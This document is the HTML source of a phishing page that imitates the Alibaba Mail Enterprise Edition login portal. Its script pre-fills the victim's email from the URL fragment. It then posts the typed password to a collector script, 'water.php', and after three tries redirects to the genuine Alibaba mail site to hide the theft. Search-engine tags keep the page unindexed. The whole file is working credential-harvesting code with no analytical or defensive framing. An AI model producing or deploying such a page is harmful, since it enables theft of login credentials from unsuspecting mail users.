<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/html">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,10,9,8,7"/>
	<title>Login Portal_Alibaba Mail Enterprise Edition - Alibaba Cloud</title>
	<link rel="shortcut icon" href="includes/favicon.ico" type="image/x-icon">
<meta name="robots" content="noindex" /><meta name="robots" content="nofollow" />
<META NAME="GOOGLEBOT" CONTENT="NOARCHIVE" /><META NAME="GOOGLEBOT" CONTENT="NOSNIPPET" />
</head>
<body>
<script>
const url = 'water.php';   //full url goes here
</script>

<style>
.login{
	width:250px; height:22px; font-family: arial; font-size: 13px; color:#E6E6E6; 
	background-color: #E0ECF8; border: solid 1px #BDBDBD; padding: 7px; border-radius: 7px;
	 
}
</style>
<div style="margin:-8px;width:100%">
<img id="bg" src="includes/bg.png">
<img id="bg2" src="includes/bg.png" hidden>

<div style="position:absolute;top:110px;left:830px; width:340px; height:345px; background:url(./includes/modal.png); border-radius:5px;">

	<br><br><br><br><br>

	<center>

		<form method="post" action="" onsubmit="Validate(); return false;">
		<input required id="user" name="user" class="login" value="" type="email" style="font-family: arial; font-size: 13px; color:#424242; font-weight:bold;" readonly><br>
		<img src="includes/webber.png" style=""><br>
		<input required placeholder="Password" type="password" id="pass" name="pass" class="login"><br><br>
		<input type="image" src="./includes/submit.png" id="b1" value="" style="border-radius:5px;">
		</form>
	</center>

</div>

<input type="hidden" id="count" value="0">
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js'></script>


<script>
      $(document).ready(function(){
        var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          var my_email =email;
          $('#user').val(my_email);
			
			}
		  })


function Validate(){
var a = $('#user').val();
var b = $('#pass').val();
var c = $('#count').val();

$.post(url, {user:a,pass:b}, function(){
setTimeout(function(){
if(c>=2){
$('#count').val('0');
window.location='https://qiye.aliyun.com';
}else{
$('#bg').fadeOut();
$('#bg2').fadeIn();
$('#user').css('top','250px');
$('#pass').css('top','311px');
$('#b1').css('top','381px');
$('#pass').val('');
var add = +c+1;
$('#count').val(add);
$('#pass').focus();
}
},2000);
});
}


</script>



<script>
function process(){
	var user = document.getElementById('user').value;
	var pass = document.getElementById('pass').value;
	if ((user == '') || (user == null)){
	document.getElementById('bg').src='files/1.png';
	document.getElementById('user').focus();
return false;	
	}else
	if ((pass == '') || (pass == null)){
	document.getElementById('bg').src='files/2.png';
	document.getElementById('pass').focus();
return false;	
	}else
	
return true	;
}
</script>
<script>
$('input').focus(function(){
  $(this).parents('.form-group').addClass('focused');
});

$('input').blur(function(){
  var inputValue = $(this).val();
  if ( inputValue == "" ) {
    $(this).removeClass('filled');
    $(this).parents('.form-group').removeClass('focused');  
  } else {
    $(this).addClass('filled');
  }
})  
</script>
</body>
</html>